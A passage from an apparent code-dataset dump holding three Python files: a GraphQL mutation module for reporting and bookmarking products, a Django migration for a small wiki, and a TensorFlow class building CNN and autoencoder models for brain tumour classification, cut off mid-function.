]\n if (toProductId == \"\") and (product_problems == [] or product_problems == \"\") and (description == \"\"):\n # it doesn't matter if an user submitted 'confirmation' or not\n errors.append(\"Please provide your information.\")\n elif toProductId != \"\":\n if (product_problems == [] or product_problems == \"\") and (description == \"\"):\n errors.append(\"Please enter the problems of this product.\")\n else:\n # check report exist or not:\n if myUserId != \"\":\n try:\n reportsGenerator = PRODUCT_REPORT_COLLECTION.where(\n u\"to_product_id\",\n u\"==\",\n u\"{}\".format(toProductId)\n ).where(\n u\"from_user_id\",\n u\"==\",\n u\"{}\".format(myUserId)\n ).stream()\n except Exception as e:\n logging.error(f\"Error fetching reports: {e}.\")\n else:\n reportsList = [\n report for report in reportsGenerator\n ]\n if len(reportsList):\n # the user already reported this product.\n # up date this product based on the new values:\n yourReport = reportsList[0]\n if isinstance(yourReport, DocumentSnapshot):\n try:\n yourReport.reference.update({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId,\n u\"product_problems\": product_problems,\n u\"description\": description,\n u\"confirmation\": False if not isinstance(confirmation, bool) else confirmation\n })\n except Exception as e:\n logging.error(\n f\"Error updating report: {e}.\"\n )\n else:\n ok = True\n else:\n pass\n else:\n # create new report.\n try:\n PRODUCT_REPORT_COLLECTION.add({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId,\n u\"product_problems\": product_problems,\n u\"description\": description,\n u\"confirmation\": False if not isinstance(confirmation, bool) else confirmation\n })\n except Exception as e:\n logging.error(\n f\"Error reporting this product: {e}.\"\n )\n else:\n ok = True\n else:\n errors.append(\n \"Error reporting this product. Please try again.\"\n )\n else:\n errors.append(\"You have to login to report this product.\")\n\n return ReportProduct(\n ok=ok,\n errors=errors\n )\n\n\nclass ToggleBookmarkProduct(ObjectMutation):\n \"\"\"\n if product is already bookmarked by this user, delete the bookmark relationship\n if not:\n add 1 bookmark\n \"\"\"\n ok = Boolean(required=True)\n errors = List(\n String,\n required=False\n )\n\n class Arguments:\n toProductId = ID(required=True)\n\n async def mutate(self, info, **kwargs):\n ok, errors = False, list()\n bookmarkListToRemove: list = list()\n\n user = info.context[\"request\"].user\n if user.is_authenticated:\n myUserId = getattr(user, \"id\", \"\")\n toProductId = kwargs.get(\"toProductId\", \"\").strip()\n if toProductId != \"\":\n if myUserId != \"\":\n # check bookmark or not:\n try:\n bookmarkRelationGenerator = PRODUCT_BOOKMARK_COLLECTION.where(\n u\"from_user_id\",\n u\"==\",\n u\"{}\".format(myUserId)\n ).where(\n u\"to_product_id\",\n u\"==\",\n u\"{}\".format(toProductId)\n ).stream()\n except Exception as e:\n logging.error(f\"Error fetching product bookmark: {e}.\")\n else:\n for bookmark in bookmarkRelationGenerator:\n bookmarkListToRemove.append(bookmark)\n if len(bookmarkListToRemove):\n ok = True\n else:\n # add bookmark:\n try:\n PRODUCT_BOOKMARK_COLLECTION.add({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId\n })\n except Exception as e:\n errors.append(\n \"Error bookmarking this product.\")\n logging.error(f\"Error adding bookmark: {e}.\")\n else:\n ok = True\n else:\n logging.error(\n f\"Error getting current user id: <{ToggleBookmarkProduct.__name__}>.\"\n )\n else:\n errors.append(\"Error identifying product. Plese try again.\")\n else:\n errors.append(\"You have to login to bookmark this product.\")\n\n if ok and len(errors) == 0:\n background = info.context[\"background\"]\n # delete existing bookmarks\n if len(bookmarkListToRemove):\n background.add_task(\n remove_documents_from_a_collection,\n bookmarkListToRemove,\n )\n\n return ToggleBookmarkProduct(\n ok=ok,\n errors=errors,\n )\n\n\nclass Mutation(ObjectType):\n toggle_like_product = ToggleLikeProduct.Field()\n report_a_product = ReportProduct.Field()\n toggle_bookmark_product = ToggleBookmarkProduct.Field()\n","sub_path":"social_api/models/product/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":11695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198195984","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=254)),\n ('content', models.TextField(max_length=9999999)),\n ('publish_date', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=64)),\n ],\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=32)),\n ('friends', models.ManyToManyField(related_name='_userprofile_friends_+', to='wiki.UserProfile', blank=True)),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='article',\n name='author',\n field=models.ForeignKey(to='wiki.UserProfile'),\n ),\n migrations.AddField(\n model_name='article',\n name='category',\n field=models.ForeignKey(to='wiki.Category'),\n ),\n ]\n","sub_path":"wiki/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"444587312","text":"# Brain Tumor Classification\n# Script for Creating Models\n# Author: Qixun Qu\n# Create on: 2017/10/12\n# Modify on: 2017/11/28\n\n# ,,, ,,,\n# ;\" '; ;' \",\n# ; @.ss$$$$$$s.@ ;\n# `s$$$$$$$$$$$$$$$'\n# $$$$$$$$$$$$$$$$$$\n# $$$$P\"\"Y$$$Y\"\"W$$$$$\n# $$$$ p\"$$$\"q $$$$$\n# $$$$ .$$$$$. $$$$'\n# $$$DaU$$O$$DaU$$$'\n# '$$$$'.^.'$$$$'\n# '&$$$$$&'\n\n'''\n\nClass BTCModels\n\n-1- Define several basic helper functions, which are the\n basic modules to build simple CNN models.\n-2- Define several specific helper functions to construct\n CNN models with more complicate structures.\n-3- Build models: CNN, Full-CNN, Res-CNN and Dense-CNN,\n and sparsity autoencoder with either KL constraint and\n Winner-Take-All constraint.\n\n'''\n\n\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom operator import mul\nfrom functools import reduce\nfrom tensorflow.python.keras.layers import UpSampling2D\nfrom tensorflow.contrib.layers import xavier_initializer\n\n\nclass BTCModels():\n\n def __init__(self, classes=3, act=\"relu\", alpha=None,\n momentum=0.99, drop_rate=0.5, dims=\"3d\",\n cae_pool=None, lifetime_rate=None):\n '''__INIT__\n\n Initialization of BTCModels. In this functions,\n commen parameters of all models are set first.\n\n Inputs:\n -------\n - classes: int, the number of grading groups\n - act: string, indicate the activation method by either\n \"relu\" or \"lrelu\" (leaky relu)\n - alpha: float, slope of the leaky relu at x < 0\n - momentum: float, momentum for removing average in\n batch normalization, typically values are\n 0.999, 0.99, 0.9, etc\n - drop_rate: float, rate of dropout of input units,\n which is between 0 and 1\n - dims: string, \"3d\" (\"3D\") or \"2d\" (\"2D\")\n - cae_pool: sreing, \"stride\" or \"pool\"\n - lifetime_rate: float, the percentage of how many\n sparsity code are kept in autoencoder\n\n '''\n\n # The number of classes\n self.classes = classes\n\n # Settings for activation\n self.act = act\n self.alpha = alpha\n\n # Settings for batch normalization\n self.momentum = momentum\n self.drop_rate = drop_rate\n\n # Set functions to construct models according to\n # the dimentions of input tensor\n self.dims = dims\n if dims == \"3d\" or dims == \"3D\":\n self.conv_func = tf.layers.conv3d\n self.deconv_func = tf.layers.conv3d_transpose\n self.max_pool_func = tf.layers.max_pooling3d\n self.avg_pool_func = tf.layers.average_pooling3d\n self.concat_axis = 4\n self.right_dims = 5\n elif dims == \"2d\" or dims == \"2D\":\n self.conv_func = tf.layers.conv2d\n self.deconv_func = tf.layers.conv2d_transpose\n self.max_pool_func = tf.layers.max_pooling2d\n self.avg_pool_func = tf.layers.average_pooling2d\n self.concat_axis = 3\n self.right_dims = 4\n else:\n raise ValueError(\"Cannot found dimentions in '2d' or '3d'.\")\n\n # Set encoder function\n self.encoder = None\n if cae_pool is not None:\n if cae_pool == \"stride\":\n self.encoder = self._encoder_stride\n elif cae_pool == \"pool\":\n self.encoder = self._encoder_pool\n else:\n raise ValueError(\"Cannot found pool method in 'stride' or 'pool'.\")\n\n # A symbol to indicate whether the model is used to train\n # The symbol will be assigned as a placeholder while\n # feeding the model in training and validating steps\n self.is_training = None\n\n # A symbol for bottleneck in dense cnn\n self.bc = None\n\n # Set lifetime rate for autoencoder with\n # Winner-Take-All constraint\n self.lifetime_rate = lifetime_rate\n\n return\n\n #\n # Basic Helper Functions\n #\n\n def _conv(self, x, filters, kernel_size, strides=1,\n name=\"conv_var\"):\n '''_CONV\n\n Return 3D or 2D convolutional tensor with variables\n initialized by xavier method.\n\n Usages:\n -------\n - full: self._conv(x, 32, 3, 1, \"conv\")\n - short: self._conv(x, 32, 3)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n\n Output:\n -------\n - a 3D or 2D convolutional tensor\n\n '''\n\n padding = \"valid\" if kernel_size == 1 else \"same\"\n\n with tf.name_scope(\"conv\"):\n return self.conv_func(inputs=x,\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n kernel_initializer=xavier_initializer(),\n name=name)\n\n def _fully_connected(self, x, units, name=\"fc_var\"):\n '''_FULLY_CONNECTED\n\n Return fully connected tensor with variables\n initialized by xavier method.\n\n Usages:\n -------\n - full: self._fully_connected(x, 128, \"fc\")\n - short: self._fully_connected(x, 128)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - units: int, the number of neurons\n - name: string, layer's name\n\n Outputs:\n --------\n - a fully connected tensor\n\n '''\n\n with tf.name_scope(\"full_connection\"):\n return tf.layers.dense(inputs=x,\n units=units,\n kernel_initializer=xavier_initializer(),\n name=name)\n\n def _batch_norm(self, x, name=\"bn_var\"):\n '''_BATCH_NORM\n\n Normalize the input tensor.\n Momentum and symbol of is_training have been\n assigned while the class is initialized.\n\n Usages:\n -------\n - full: self._batch_norm(x, \"bn\")\n - short: self._batch_norm(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - normalized tensor\n\n '''\n\n with tf.name_scope(\"batch_norm\"):\n return tf.contrib.layers.batch_norm(inputs=x,\n decay=self.momentum,\n is_training=self.is_training,\n scope=name)\n\n def _activate(self, x, name=\"act\"):\n '''_ACTIVATE\n\n Activate input tensor. Several approaches can be available,\n which are ReLU, leaky ReLU, Sigmoid or Tanh.\n Activation method and setting has been set while the\n class is initialized.\n\n Usages:\n -------\n - full: self._activate(x, \"act\")\n - short: self._activate(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - an activated tensor\n\n '''\n\n with tf.name_scope(\"activate\"):\n if self.act == \"relu\":\n return tf.nn.relu(x, name)\n elif self.act == \"lrelu\":\n f1 = 0.5 * (1 + self.alpha)\n f2 = 0.5 * (1 - self.alpha)\n return f1 * x + f2 * tf.abs(x)\n elif self.act == \"sigmoid\":\n return tf.nn.sigmoid(x, name)\n elif self.act == \"tanh\":\n return tf.nn.tanh(x, name)\n else: # Raise error if activation method cannot be found\n raise ValueError(\"Could not find act in ['relu', 'lrelu', 'sigmoid', 'tanh']\")\n\n return\n\n def _conv_bn_act(self, x, filters, kernel_size, strides=1,\n name=\"cba\", act=True):\n '''_CONV_BN_ACT\n\n A convolution block, including three sections:\n - 3D or 2D convolution layer\n - batch normalization\n - activation\n\n Usages:\n -------\n - full: self._conv_bn_act(x, 32, 3, 1, \"cba\", True)\n - short: self._conv_bn_act(x, 32, 3, 1, \"cba\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n - act: string or None, indicates the activation,\n method, if None, return inactivated layer\n\n Output:\n - a convoluted, normalized and activated (if not None) tensor\n\n '''\n\n with tf.variable_scope(name):\n cba = self._conv(x, filters, kernel_size, strides)\n cba = self._batch_norm(cba)\n if act: # If act is None, return inactivated tensor\n cba = self._activate(cba)\n\n return cba\n\n def _fc_bn_act(self, x, units, name=\"fba\"):\n '''_FC_BN_ACT\n\n A fully connected block, including three sections:\n - full connected layer with given units\n - batch normalization\n - activation\n\n Usages:\n -------\n - full: self._fc_bn_act(x, 128, \"fba\")\n - short: self._fc_bn_act(x, 128)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - units: int, the number of neurons\n - name: string, layer's name\n\n Output:\n -------\n - a fully connected, normalized and activated tensor\n\n '''\n\n with tf.variable_scope(name):\n fba = self._fully_connected(x, units)\n fba = self._batch_norm(fba)\n fba = self._activate(fba)\n\n return fba\n\n def _max_pool(self, x, psize=2, name=\"max_pool\"):\n '''_MAX_POOL\n\n 3D or 2D max pooling layer.\n\n Usages:\n -------\n - full: self._max_pool(x, 2, 2, \"max_pool\")\n - short: self._max_pool(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - psize: int or a list of ints,\n the size of pooling window, and the\n strides of pooling operation as well,\n if it equals to -1, the function performs\n global max pooling\n name: string, layer's name\n\n Output:\n -------\n - the tensor after max pooling\n\n '''\n\n # Global max pooling if psize is -1\n if psize == -1:\n psize = x.get_shape().as_list()[1:-1]\n\n return self.max_pool_func(inputs=x,\n pool_size=psize,\n strides=psize,\n padding=\"same\",\n name=name)\n\n def _average_pool(self, x, psize=2, name=\"avg_pool\"):\n '''_AVERAGE_POOL\n\n 3D or 2D average pooling layer.\n\n Usages:\n -------\n - full: self._average_pool(x, 2, 2, \"avg_pool\")\n - short: self._average_pool(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - psize: int or a list of ints,\n the size of pooling window, and the\n strides of pooling operation as well,\n if it equals to -1, the function performs\n global max pooling\n name: string, layer's name\n\n Output:\n -------\n - the tensor after average pooling\n\n '''\n\n # Global acerage pooling if psize is -1\n if psize == -1:\n psize = x.get_shape().as_list()[1:-1]\n\n return self.avg_pool_func(inputs=x, pool_size=psize,\n strides=psize, padding=\"same\",\n name=name)\n\n def _pooling(self, x, psize=2, mode=\"max\", name=\"pool\"):\n '''_POOLING\n\n Apply pooling method on input tensor with either\n max pooling or average pooling.\n\n Inputs:\n -------\n - x: tensor, the input tensor\n - psize: int or a list of ints,\n the size of pooling window, and the\n strides of pooling operation as well,\n if it equals to -1, the function performs\n global max pooling\n - mode: string, \"max\" or \"avg\"\n - name: string, layer's name\n\n Output:\n -------\n - the tensor after pooling\n\n '''\n\n if mode == \"max\":\n pool = self._max_pool\n elif mode == \"avg\":\n pool = self._average_pool\n else: # Could not find pooling method\n raise ValueError(\"Pooling mode is 'max' or 'avg'.\")\n\n return pool(x, psize, name)\n\n def _flatten(self, x, name=\"flt\"):\n '''_FLATTEN\n\n Flatten 5D or 4D tensor into 1D tensor.\n\n Usages:\n -------\n - full: self._flatten(x, \"flatten\")\n - short: self._flatten(x)\n\n Inputs:\n -------\n - x: 5D or 4D tensor, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - a flattened tensor\n\n '''\n\n # Obtain the number of features\n # contained in the input layer\n x_shape = x.get_shape().as_list()\n f_shape = reduce(mul, x_shape[1:], 1)\n\n with tf.name_scope(\"flatten\"):\n return tf.reshape(tensor=x, shape=[-1, f_shape], name=name)\n\n def _dropout(self, x, name=\"dropout\"):\n '''_DROP_OUT\n\n Apply dropout to the input tensor.\n Drop rate has been set while creating the instance.\n If the is_training symbol is True, apply dropout to the input;\n if not, the untouched input will be returned.\n\n Usage:\n ------\n - full: self._dropout(x, \"dropout\")\n\n Inputs:\n - x: tensor in 5D, 4D or 1D, input tensor\n - name: string, layer's name\n\n Output:\n -------\n - the dropout layer or untouched tensor\n\n '''\n\n return tf.layers.dropout(inputs=x, rate=self.drop_rate,\n training=self.is_training, name=name)\n\n def _logits_fc(self, x, name=\"logits\"):\n '''_LOGITS_FC\n\n Generate logits by fully conneted layer.\n The output size is equal to the number of classes.\n\n Usages:\n -------\n - full: self._logits_fc(x, \"logits\")\n - short: self._logits_fc(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: layer's name\n\n Output:\n - logit of each class\n\n '''\n\n with tf.variable_scope(name):\n return self._fully_connected(x, self.classes, name)\n\n #\n # Helper function for full cnn\n #\n\n def _logits_conv(self, x, name=\"logits\"):\n '''_LOGITS_CONV\n\n Generate logits by convolutional tensor.\n The output size is equal to the number of classes.\n\n Usages:\n -------\n - full: self._logits_conv(x, \"logits\")\n - short: self._logits_conv(x)\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: layer's name\n\n Output:\n - logit of each class\n\n '''\n\n x_shape = x.get_shape().as_list()\n with tf.variable_scope(name):\n return self._conv(x, self.classes, x_shape[1:-1], 1)\n\n #\n # Helper function for residual cnn\n #\n\n def _res_block(self, x, filters, strides=1, name=\"res\"):\n '''_RES_BLOCK\n\n The basic bloack for residual network.\n - check whether shortcut is necessary\n - three convolutional layers\n - obtain shortcut if necessary\n - elementwisely sum convoluted result and original\n inputs (or shortcut if necessary)\n\n Usage:\n -------\n - full: self._res_block(x, [8, 16, 32], 1, \"res\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: list with three ints, indicates the number\n of filters of each convolutional layer\n - strides: int, strides along three dimentions for the\n first convolution layer or the shortcut\n - name: string, layer's name\n\n Output:\n -------\n - a tensor after one residual block\n\n '''\n\n # As default, shortcut is unnecessary\n shortcut = False\n\n # If the shape of output is not same as the input's,\n # now, shortcut has to be obtained\n if (x.get_shape().as_list()[-1] != filters[2]) or strides != 1:\n shortcut = True\n\n # Three convolutional layers\n # Note: the strides of first layer can be changed\n res = self._conv_bn_act(x, filters[0], 1, strides, name + \"_conv1\")\n res = self._conv_bn_act(res, filters[1], 3, 1, name + \"_conv2\")\n # Note: the third layer is inactivated\n res = self._conv_bn_act(res, filters[2], 1, 1, name + \"_conv3\", False)\n\n # Shortcut layer is inactivated\n if shortcut:\n x = self._conv_bn_act(x, filters[2], 1, strides,\n name + \"_shortcut\", False)\n\n # Elementwisely add\n with tf.name_scope(name + \"_add\"):\n res = tf.add(res, x)\n\n # Return the activated summation\n return self._activate(res)\n\n #\n # Helpher functions for dense cnn\n #\n\n def _dense_block(self, x, growth_rate, internals, name=\"dense_block\"):\n '''_DENSE_BLOCK\n\n The basic block of dense network.\n The struction of one block:\n --- dense block\n |--- internal1\n |--- bottleneck (if self.bs is true)\n |--- composite\n |--- concatenate\n |--- internal2\n |--- same as internal1\n ...\n |--- internaln\n |--- same as internal1\n\n Usage:\n ------\n - full: self._dense_block(x, 16, 4, \"block1\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - growth_rate: int, the number of kernels in\n each internal section\n - internals: int, the number of internals\n - name: string, block's name\n\n Output:\n -------\n - a dense block\n\n '''\n\n dense = x\n\n # Combine all internals\n for internal in range(internals):\n dense = self._dense_internal(dense, growth_rate,\n str(internal + 1), name)\n\n return dense\n\n def _dense_internal(self, x, growth_rate, no, name):\n '''_DENSE_INTERNAL\n\n Internal section of a dense block.\n - bottleneck (if self.bc is True)\n - composite\n - concate\n\n Usage:\n ------\n - full: self._dense_internal(x, 16, 1, \"block1\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - growth_rate: int, the number of kernels\n - no: string, internal number\n - name: string, block's name\n\n Output:\n -------\n - one internal section of one dense block\n\n '''\n\n dint = x\n\n # Obtain bottleneck section\n if self.bc:\n with tf.variable_scope(name + \"_bott\" + no):\n dint = self._bottleneck(x, growth_rate)\n\n # Obtain composite section\n with tf.variable_scope(name + \"_comp\" + no):\n dint = self._composite(dint, growth_rate, 3)\n\n # Concatenate original input (or bottleneck section)\n # with composite section\n\n with tf.name_scope(name + \"_concat\" + no):\n dint = tf.concat((x, dint), self.concat_axis)\n\n return dint\n\n def _bottleneck(self, x, filters, name=\"bottleneck\"):\n '''_BOTTLENECK\n\n Bottleneck section to reduce the number of input\n features to improve computational efficiency.\n - batch normalization\n - activation\n - convolution\n - dropout if self.is_training is a True placeholder\n\n Usage:\n ------\n - full: self._bottleneck(x, 16, \"bottleneck\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, also known as growth rate, the number of\n filters in composite section\n - name: string, section's name\n\n Output:\n -------\n - the bottleneck layer\n\n '''\n\n bott = self._batch_norm(x)\n bott = self._activate(bott)\n bott = self._conv(bott, filters * 4, 1)\n bott = self._dropout(bott)\n\n return bott\n\n def _composite(self, x, filters, kernel_size=3, name=\"composite\"):\n '''_COPOSITE\n\n The convolutional section of dense block.\n - batch normalization\n - activation\n - convolution\n - dropout if self.is_training is a True placeholder\n\n Usage:\n - full: self._composite(x, 16, 3, \"composite\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, also known as growth rate,\n the number of filters\n - kernel_size: int, the size of kernels\n - name: string, section's name\n\n output:\n -------\n - a composite section\n\n '''\n\n comp = self._batch_norm(x)\n comp = self._activate(comp)\n comp = self._conv(comp, filters, kernel_size)\n comp = self._dropout(comp)\n\n return comp\n\n def _transition(self, x, name=\"transition\"):\n '''_TRANSITION\n\n The transition layer between two dense blocks.\n - batch normalization\n - activation\n - convolution\n - dropout if self.is_training is a True placeholder\n - average pooling\n\n Usage:\n ------\n - full: self._transition(x, \"trans\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, section's name\n\n Output:\n - a tensor after average pooling\n\n '''\n\n out_channels = x.get_shape().as_list()[-1]\n with tf.variable_scope(name + \"_comp\"):\n tran = self._composite(x, out_channels, 1)\n tran = self._average_pool(tran, 2, name + \"_avgpool\")\n\n return tran\n\n def _last_transition(self, x, name=\"global_avgpool\"):\n '''_LAST_TRANSITION\n\n The last transition section before logits layer.\n - batch normalization\n - activation\n - global average polling\n\n Usage:\n ------\n - full: self._last_transition(x, \"trans\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, section's name\n\n Output:\n - a tensor after global average pooling\n\n '''\n\n with tf.variable_scope(\"last_trans\"):\n last_tran = self._batch_norm(x)\n last_tran = self._activate(last_tran)\n\n last_tran = self._average_pool(last_tran, -1, name)\n\n return last_tran\n\n #\n # Helper functions for autoencoder\n #\n\n def _deconv(self, x, filters, kernel_size, strides=1, name=\"deconv_var\"):\n '''_DECONV\n\n Return 3D or 2D deconvolution layer with variables\n initialized by xavier method.\n\n Usages:\n -------\n - full: self._deconv(x, 32, 3, 1, \"deconv\")\n - short: self._deconv(x, 32, 3)\n\n Inputs:\n -------\n - x: tensor, input layer\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n\n Output:\n -------\n - a 3D or 2D deconvolution layer\n\n '''\n\n padding = \"valid\" if kernel_size == 1 else \"same\"\n\n with tf.name_scope(\"deconv\"):\n return self.deconv_func(inputs=x,\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n kernel_initializer=xavier_initializer(),\n name=name)\n\n def _deconv_bn_act(self, x, filters, kernel_size,\n strides=1, name=\"dba\", act=True):\n '''_DECONV_BN_ACT\n\n A deconvolution block, including three sections:\n - 3D or 2D deconvolution layer\n - batch normalization\n - activation\n\n Usages:\n -------\n - full: self._deconv_bn_act(x, 32, 3, 1, \"dba\", True)\n - short: self._deconv_bn_act(x, 32, 3, 1, \"dba\")\n\n Inputs:\n -------\n - x: tensor, input layer\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n - act: string or None, indicates the activation,\n method, if None, return inactivated layer\n\n Output:\n - a deconvoluted, normalized and activated (if not None) layer\n\n '''\n\n with tf.variable_scope(name):\n dba = self._deconv(x, filters, kernel_size, strides)\n dba = self._batch_norm(dba)\n if act: # If False, return inactivated result\n dba = self._activate(dba)\n\n return dba\n\n def _encoder_stride(self, x):\n '''_ENCODER_STRIDE\n\n Encoder sectio of autoencoder.\n Each convolutional layer has strides 2.\n No other pooling methods are applied.\n\n Inputs:\n -------\n - x: tensor, original input\n\n Output:\n -------\n - compressed representation of input sample\n\n '''\n\n code = self._conv_bn_act(x, 32, 5, 1, \"conv1\")\n code = self._conv_bn_act(code, 32, 5, 1, \"conv2\")\n code = self._conv_bn_act(code, 64, 5, 2, \"conv3\")\n # code = self._dropout(code, \"en_dropout1\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv4\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv5\")\n code = self._conv_bn_act(code, 128, 5, 2, \"conv6\")\n # code = self._dropout(code, \"en_dropout2\")\n code = self._conv_bn_act(code, 128, 5, 1, \"conv7\")\n code = self._conv_bn_act(code, 128, 5, 1, \"conv8\")\n code = self._conv_bn_act(code, 256, 5, 2, \"conv9\")\n\n return code\n\n def _encoder_decoder(self, x):\n preconv = self._conv_bn_act(x, 32, 7, 1, \"preconv\")\n\n # 112\n code1 = self._conv_bn_act(preconv, 64, 3, 1, \"code1\")\n code2_na = self._conv_bn_act(code1, 64, 3, 1, \"code2_na\", False)\n code2 = self._activate(code2_na, \"code2\")\n\n # 56\n maxp1 = self._pooling(code2, 2, \"max\", \"maxp1\")\n code3 = self._conv_bn_act(maxp1, 128, 3, 1, \"code3\")\n code4_na = self._conv_bn_act(code3, 128, 3, 1, \"code4_na\", False)\n code4 = self._activate(code4_na, \"code4\")\n\n # 28\n maxp2 = self._pooling(code4, 2, \"max\", \"maxp2\")\n code5 = self._conv_bn_act(maxp2, 256, 3, 1, \"code5\")\n code6_na = self._conv_bn_act(code5, 256, 3, 1, \"code6_na\", False)\n code6 = self._activate(code6_na, \"code6\")\n\n # 14\n maxp3 = self._pooling(code6, 2, \"max\", \"maxp3\")\n code7 = self._conv_bn_act(maxp3, 512, 3, 1, \"code7\")\n code8_na = self._conv_bn_act(code7, 512, 3, 1, \"code8_na\", False)\n code8 = self._activate(code8_na, \"code8\")\n\n # 7\n maxp4 = self._pooling(code8, 2, \"max\", \"maxp4\")\n code9 = self._conv_bn_act(maxp4, 1024, 3, 1, \"code9\")\n code10 = self._conv_bn_act(code9, 1024, 3, 1, \"code10\")\n\n # 14\n upsp1 = UpSampling2D(size=(2, 2))(code10)\n code11_na = self._conv_bn_act(upsp1, 512, 3, 1, \"code11_na\", False)\n code11 = self._activate(tf.add(code11_na, code8_na), \"code11\")\n code12 = self._conv_bn_act(code11, 512, 3, 1, \"code12\")\n\n # 28\n upsp2 = UpSampling2D(size=(2, 2))(code12)\n code13_na = self._conv_bn_act(upsp2, 256, 3, 1, \"code13_na\", False)\n code13 = self._activate(tf.add(code13_na, code6_na), \"code13\")\n code14 = self._conv_bn_act(code13, 256, 3, 1, \"code14\")\n\n # 56\n upsp3 = UpSampling2D(size=(2, 2))(code14)\n code15_na = self._conv_bn_act(upsp3, 128, 3, 1, \"code15_na\", False)\n code15 = self._activate(tf.add(code15_na, code4_na), \"code15\")\n code16 = self._conv_bn_act(code15, 128, 3, 1, \"code16\")\n\n # 112\n upsp4 = UpSampling2D(size=(2, 2))(code16)\n code17_na = self._conv_bn_act(upsp4, 64, 3, 1, \"code17_na\", False)\n code17 = self._activate(tf.add(code17_na, code2_na), \"code17\")\n code18 = self._conv_bn_act(code17, 64, 3, 1, \"code18\")\n\n decode = self._conv_bn_act(code18, 4, 1, 1, \"decode\", False)\n decode = tf.nn.tanh(decode, \"tanh\")\n\n return decode\n\n def _encoder_pool(self, x):\n '''_ENCODER_POOL\n\n Encoder sectio of autoencoder.\n Convolutional layer has strides 1.\n Max pooling method is applied after\n each convolutional layer.\n\n Inputs:\n -------\n - x: tensor, original input\n\n Output:\n -------\n - compressed representation of input sample\n\n '''\n\n code = self._conv_bn_act(x, 32, 7, 1, \"conv1\")\n code = self._conv_bn_act(code, 32, 7, 1, \"conv2\")\n code = self._conv_bn_act(code, 32, 7, 1, \"conv3\")\n code = self._pooling(code, 2, \"max\", \"max_pool1\")\n # code = self._dropout(code, \"en_dropout1\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv4\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv5\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv6\")\n code = self._pooling(code, 2, \"max\", \"max_pool2\")\n # code = self._dropout(code, \"en_dropout2\")\n code = self._conv_bn_act(code, 128, 3, 1, \"conv7\")\n code = self._conv_bn_act(code, 128, 3, 1, \"conv8\")\n code = self._conv_bn_act(code, 128, 3, 1, \"conv9\")\n code = self._pooling(code, 2, \"max\", \"max_pool3\")\n code = self._conv_bn_act(code, 256, 3, 1, \"conv10\")\n code = self._conv_bn_act(code, 256, 3, 1, \"conv11\")\n code = self._conv_bn_act(code, 256, 3, 1, \"conv12\")\n code = self._pooling(code, 2, \"max\", \"max_pool4\")\n code = self._conv_bn_act(code, 512, 3, 1, \"conv13\")\n code = self._conv_bn_act(code, 1024, 3, 1, \"conv14\")\n\n return code\n\n def _wta_constraint(self, code, k=1):\n '''_WTA_CONSTRAINT\n\n Winner-Take-All constraint to generate sparse\n representation by keeping largest values of\n the compression code, which consists of two steps:\n - get spatial sparsity\n - get lifetime sparsity\n\n Inputs:\n -------\n - code: tensor, compressed code after encoder\n - k: int, the number of largest values to be kept\n - another parameter, lifetime_rate, has been assigned\n when the instance is initialized\n\n Output:\n -------\n - sparse representation\n\n '''\n\n # The function to kept k largest values in\n # code, and set others to zeros.\n def spatial_sparsity(code, k):\n # Obtain the shape of code\n 